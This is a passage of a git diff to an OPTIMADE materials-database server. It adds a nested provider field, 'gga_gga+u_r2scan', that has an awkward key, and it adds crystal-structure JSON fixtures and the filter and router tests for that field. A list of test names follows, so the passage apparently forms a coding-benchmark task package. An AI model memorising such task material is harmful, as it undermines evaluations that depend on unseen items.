[0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051], [0.8417172367979051, 0.8417172367979051, 0.8417172367979051]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "Ce", "Fe", "H", "Na", "O", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.6136363636363636, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A27B8C2D2E2FGH", "last_modified": {"$date": "2019-06-08T05:13:37.943Z"}, "lattice_vectors": [[3.6001175409341037, 0, 0], [0, 4.438478811675378, 0], [0, 0, 7.718814146224643]], "nelements": 8, "nsites": 44, "pretty_formula": "Ba2Ce2FeHNaO27Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["Ce"], "concentration": [1.0], "name": "Ce"}, {"chemical_symbols": ["Fe"], "concentration": [1.0], "name": "Fe"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Si"], "concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "Ce", "Ce", "Fe", "H", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3803", "_exmpl_this_provider_field": "test"}} -{"type": "structures", "id": "mpf_3819", "attributes": {"immutable_id": "5cfb441f053b174410701bec", "assemblies": null, "chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti", "cartesian_site_positions": [[0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "F", "H", "Mn", "Na", "O", "Re", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.5909090909090909, 0.045454545454545456, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A26B8C2D2E2FGHI", "last_modified": {"$date": "2018-06-08T05:13:37.945Z"}, "lattice_vectors": [[0.541264110585089, 0, 0], [0, 0.5211563701526833, 0], [0, 0, 4.063577553377723]], "nelements": 9, "nsites": 44, "pretty_formula": "Ba2FHMnNaO26Re2Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["F"], "concentration": [1.0], "name": "F"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Mn"], "concentration": [1.0], "name": "Mn"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Re"], "concentration": [1.0], "name": "Re"}, {"chemical_symbols": ["Si"], "concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "F", "H", "Mn", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Re", "Re", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3819", "relationships": {"references": {"data": [{"type": "references", "id": "dummy/2019"}]}}}} +{"type": "structures", "id": "mpf_3819", "attributes": {"_exmpl_stability": {"gga_gga+u_r2scan": -0.1}, "immutable_id": "5cfb441f053b174410701bec", "assemblies": null, "chemsys": "Ba-F-H-Mn-Na-O-Re-Si-Ti", "cartesian_site_positions": [[0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642], [0.24056412649964642, 0.24056412649964642, 0.24056412649964642]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ba", "F", "H", "Mn", "Na", "O", "Re", "Si", "Ti"], "elements_ratios": [0.045454545454545456, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.022727272727272728, 0.5909090909090909, 0.045454545454545456, 0.18181818181818182, 0.045454545454545456], "formula_anonymous": "A26B8C2D2E2FGHI", "last_modified": {"$date": "2018-06-08T05:13:37.945Z"}, "lattice_vectors": [[0.541264110585089, 0, 0], [0, 0.5211563701526833, 0], [0, 0, 4.063577553377723]], "nelements": 9, "nsites": 44, "pretty_formula": "Ba2FHMnNaO26Re2Si8Ti2", "species": [{"chemical_symbols": ["Ba"], "concentration": [1.0], "name": "Ba"}, {"chemical_symbols": ["F"], "concentration": [1.0], "name": "F"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["Mn"], "concentration": [1.0], "name": "Mn"}, {"chemical_symbols": ["Na"], "concentration": [1.0], "name": "Na"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["Re"], "concentration": [1.0], "name": "Re"}, {"chemical_symbols": ["Si"], "concentration": [1.0], "name": "Si"}, {"chemical_symbols": ["Ti"], "concentration": [1.0], "name": "Ti"}], "species_at_sites": ["Ba", "Ba", "F", "H", "Mn", "Na", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "Re", "Re", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Si", "Ti", "Ti"], "structure_features": [], "task_id": "mpf_3819", "relationships": {"references": {"data": [{"type": "references", "id": "dummy/2019"}]}}}} {"type": "structures", "id": "mpf_446", "attributes": {"immutable_id": "5cfb441f053b174410700ebf", "assemblies": null, "chemsys": "Ag-Br-Cl-Hg-I-S", "cartesian_site_positions": [[0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678], [0.7184493830657678, 0.7184493830657678, 0.7184493830657678]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "Br", "Cl", "Hg", "I", "S"], "elements_ratios": [0.2222222222222222, 0.05555555555555555, 0.1111111111111111, 0.2777777777777778, 0.05555555555555555, 0.2777777777777778], "formula_anonymous": "A5B5C4D2EF", "last_modified": {"$date": "2019-06-08T05:13:37.412Z"}, "lattice_vectors": [[5.132691156529571, 0, 0], [0, 1.8270015294181907, 0], [0, 0, 4.5549149749018225]], "nelements": 6, "nsites": 18, "pretty_formula": "Ag4BrCl2Hg5IS5", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["Br"], "concentration": [1.0], "name": "Br"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["Hg"], "concentration": [1.0], "name": "Hg"}, {"chemical_symbols": ["I"], "concentration": [1.0], "name": "I"}, {"chemical_symbols": ["S"], "concentration": [1.0], "name": "S"}], "species_at_sites": ["Ag", "Ag", "Ag", "Ag", "Br", "Cl", "Cl", "Hg", "Hg", "Hg", "Hg", "Hg", "I", "S", "S", "S", "S", "S"], "structure_features": [], "task_id": "mpf_446", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_551", "attributes": {"immutable_id": "5cfb441f053b174410700f28", "assemblies": null, "chemsys": "Ag-B-C-Cl-H-N-O-P", "cartesian_site_positions": [[0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956], [0.449480176317956, 0.449480176317956, 0.449480176317956]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "B", "C", "Cl", "H", "N", "O", "P"], "elements_ratios": [0.013513513513513514, 0.13513513513513514, 0.20270270270270271, 0.02702702702702703, 0.5405405405405406, 0.013513513513513514, 0.04054054054054054, 0.02702702702702703], "formula_anonymous": "A40B15C10D3E2F2GH", "last_modified": {"$date": "2019-06-08T05:13:37.434Z"}, "lattice_vectors": [[5.055370731514176, 0, 0], [0, 4.77221883540092, 0], [0, 0, 5.704704278000719]], "nelements": 8, "nsites": 74, "pretty_formula": "AgB10C15Cl2H40NO3P2", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["B"], "concentration": [1.0], "name": "B"}, {"chemical_symbols": ["C"], "concentration": [1.0], "name": "C"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["N"], "concentration": [1.0], "name": "N"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["P"], "concentration": [1.0], "name": "P"}], "species_at_sites": ["Ag", "B", "B", "B", "B", "B", "B", "B", "B", "B", "B", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "C", "Cl", "Cl", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "N", "O", "O", "O", "P", "P"], "structure_features": [], "task_id": "mpf_551", "_exmpl_this_provider_field": "test"}} {"type": "structures", "id": "mpf_632", "attributes": {"immutable_id": "5cfb441f053b174410700f79", "assemblies": null, "chemsys": "Ag-C-Cl-H-N-O-S", "cartesian_site_positions": [[0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374], [0.9116303665281374, 0.9116303665281374, 0.9116303665281374]], "dimension_types": [1, 1, 1], "nperiodic_dimensions": 3, "elements": ["Ag", "C", "Cl", "H", "N", "O", "S"], "elements_ratios": [0.034482758620689655, 0.10344827586206896, 0.034482758620689655, 0.4827586206896552, 0.20689655172413793, 0.034482758620689655, 0.10344827586206896], "formula_anonymous": "A14B6C3D3EFG", "last_modified": {"$date": "2019-06-08T05:13:37.450Z"}, "lattice_vectors": [[4.438269887249414, 0, 0], [0, 0.0037263506973483906, 0], [0, 0, 2.879535498740032]], "nelements": 7, "nsites": 29, "pretty_formula": "AgC3ClH14N6OS3", "species": [{"chemical_symbols": ["Ag"], "concentration": [1.0], "name": "Ag"}, {"chemical_symbols": ["C"], "concentration": [1.0], "name": "C"}, {"chemical_symbols": ["Cl"], "concentration": [1.0], "name": "Cl"}, {"chemical_symbols": ["H"], "concentration": [1.0], "name": "H"}, {"chemical_symbols": ["N"], "concentration": [1.0], "name": "N"}, {"chemical_symbols": ["O"], "concentration": [1.0], "name": "O"}, {"chemical_symbols": ["S"], "concentration": [1.0], "name": "S"}], "species_at_sites": ["Ag", "C", "C", "C", "Cl", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "H", "N", "N", "N", "N", "N", "N", "O", "S", "S", "S"], "structure_features": [], "task_id": "mpf_632", "_exmpl_this_provider_field": "test"}} diff --git a/optimade/server/data/test_structures.json b/optimade/server/data/test_structures.json index 5a91e3b6..b22e18b7 100644 --- a/optimade/server/data/test_structures.json +++ b/optimade/server/data/test_structures.json @@ -3757,6 +3757,7 @@ ], "structure_features": [], "task_id": "mpf_3819", + "_exmpl_stability": {"gga_gga+u_r2scan": -0.2}, "relationships": { "references": { "data": [ diff --git a/tests/filterparser/test_filterparser.py b/tests/filterparser/test_filterparser.py index 5a01130b..14bca306 100644 --- a/tests/filterparser/test_filterparser.py +++ b/tests/filterparser/test_filterparser.py @@ -269,7 +269,7 @@ class TestParserV1_2_0(TestParserV1_0_0): """ version = (1, 2, 0) - variant = "develop" + variant = "default" def test_boolean_values(self): assert isinstance( @@ -291,3 +291,4 @@ class TestParserV1_2_0(TestParserV1_0_0): self.parse("NOT _exmpl_element_counts = TRUE"), Tree, ) + assert isinstance(self.parse("_mp_stability.gga_gga+u_r2scan <= 0.0"), Tree) diff --git a/tests/filtertransformers/test_mongo.py b/tests/filtertransformers/test_mongo.py index 44f38614..3f3b67c2 100644 --- a/tests/filtertransformers/test_mongo.py +++ b/tests/filtertransformers/test_mongo.py @@ -13,7 +13,7 @@ from optimade.warnings import UnknownProviderProperty class TestMongoTransformer: - version = (1, 0, 0) + version = (1, 2, 0) variant = "default" @pytest.fixture(autouse=True) @@ -41,6 +41,11 @@ class TestMongoTransformer: with pytest.raises(BadRequest): self.transform("BadLuck IS KNOWN") # contains upper-case letters + def test_awkward_nested_field(self): + assert self.transform("_mp_stability.gga_gga+u_r2scan <= 0.0") == { + "_mp_stability.gga_gga+u_r2scan": {"$lte": 0.0} + } + def test_provider_property_name(self): # database-provider-specific prefixes assert self.transform("_exmpl_formula_sum = 1") == { diff --git a/tests/server/routers/test_structures.py b/tests/server/routers/test_structures.py index a0e089f2..5c107e79 100644 --- a/tests/server/routers/test_structures.py +++ b/tests/server/routers/test_structures.py @@ -1,8 +1,11 @@ +import pytest + from optimade.models import ( ReferenceResource, StructureResponseMany, StructureResponseOne, ) +from optimade.server.config import CONFIG, SupportedBackend from ..utils import RegularEndpointTests @@ -80,6 +83,19 @@ def test_check_response_single_structure(check_response): check_response(request, expected_ids=expected_ids) +@pytest.mark.xfail( + CONFIG.database_backend == SupportedBackend.ELASTIC, + reason="Elasticsearch implementation does not support nested provider fields.", +) +def test_awkward_nested_provider_field(check_response): + """Tests that structures with a nested provider field that breaks + identifier field names can still be filtered on. + """ + + request = "/structures?filter=_exmpl_stability.gga_gga%2Bu_r2scan < 0" + check_response(request, expected_ids=["mpf_3819"]) + + class TestMissingSingleStructureEndpoint(RegularEndpointTests): """Tests for /structures/<entry_id> for unknown <entry_id>""" diff --git a/tests/server/test_client.py b/tests/server/test_client.py index 796cb1a7..69d9b7bb 100644 --- a/tests/server/test_client.py +++ b/tests/server/test_client.py @@ -509,7 +509,7 @@ def test_list_properties( results = cli.list_properties("structures") for database in results: - assert len(results[database]) == 27, str(results[database]) + assert len(results[database]) == 28, str(results[database]) results = cli.search_property("structures", "site") for database in results: diff --git a/tests/test_config.json b/tests/test_config.json index df614295..a1adee5b 100644 --- a/tests/test_config.json +++ b/tests/test_config.json @@ -22,7 +22,8 @@ "structures": [ "band_gap", {"name": "chemsys", "type": "string", "description": "A string representing the chemical system in an ordered fashion"}, - {"name": "_exmpl_this_provider_field", "type": "string", "description": "A field defined by this provider, added to this config to check whether the server will pass it through without adding two prefixes."} + {"name": "_exmpl_this_provider_field", "type": "string", "description": "A field defined by this provider, added to this config to check whether the server will pass it through without adding two prefixes."}, + {"name": "_exmpl_stability", "type": "dictionary", "description": "A dictionary field with some naughty keys that contain non-URL-safe characters."} ] }, "aliases": {
[ "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_boolean_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_empty", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_awkward_nested_field", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_provider_property_name", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_nested_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_string_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_number_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_simple_comparisons", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_operators", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_filtering_on_relationships", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_other_provider_fields", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_not_implemented", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_length_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_suspected_timestamp_fields", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_unaliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_mongo_special_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_known_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_precedence", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_special_cases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_constant_first_comparisson", "tests/server/routers/test_structures.py::test_awkward_nested_provider_field" ]
